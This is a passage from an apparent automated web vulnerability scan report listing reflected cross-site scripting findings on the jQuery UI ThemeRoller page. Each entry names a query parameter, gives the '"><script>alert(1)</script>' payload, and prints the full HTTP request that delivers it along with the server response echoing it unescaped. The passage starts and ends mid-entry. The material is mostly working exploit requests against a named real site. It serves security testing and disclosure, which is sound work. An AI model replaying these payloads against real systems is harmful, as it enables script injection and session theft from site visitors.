This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaad0563"><script>alert(1)</script>fc3d1d00bb8&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaad0563"><script>alert(1)</script>fc3d1d00bb8&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

1.143. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 982d9"><script>alert(1)</script>55b8ae64af1 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3982d9"><script>alert(1)</script>55b8ae64af1&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3982d9"><script>alert(1)</script>55b8ae64af1&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

1.144. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a776"><script>alert(1)</script>659f328534c was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a4a776"><script>alert(1)</script>659f328534c&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a4a776"><script>alert(1)</script>659f328534c&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

1.145. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b0e"><script>alert(1)</script>698c2ece447 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa4b0e"><script>alert(1)</script>698c2ece447&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaa4b0e"><script>alert(1)</script>698c2ece447&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

1.146. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9653f"><script>alert(1)</script>08fffe5d166 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19653f"><script>alert(1)</script>08fffe5d166&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19653f"><script>alert(1)</script>08fffe5d166&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

1.147. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ee9"><script>alert(1)</script>808af5a1e60 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999e6ee9"><script>alert(1)</script>808af5a1e60&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999e6ee9"><script>alert(1)</script>808af5a1e60&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

1.148. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e82d4"><script>alert(1)</script>74d896ec235 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxe82d4"><script>alert(1)</script>74d896ec235&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxe82d4"><script>alert(1)</script>74d896ec235&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

1.149. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3f65"><script>alert(1)</script>0db52cdcee0 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxd3f65"><script>alert(1)</script>0db52cdcee0 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:27:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxd3f65"><script>alert(1)</script>0db52cdcee0" type="text/css" media="all" />
...[SNIP]...

1.150. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a38c7"><script>alert(1)</script>8771107acaa was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121a38c7"><script>alert(1)</script>8771107acaa&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121a38c7"><script>alert(1)</script>8771107acaa&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

1.151. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f066a"><script>alert(1)</script>31ec4226d13 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222f066a"><script>alert(1)</script>31ec4226d13&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01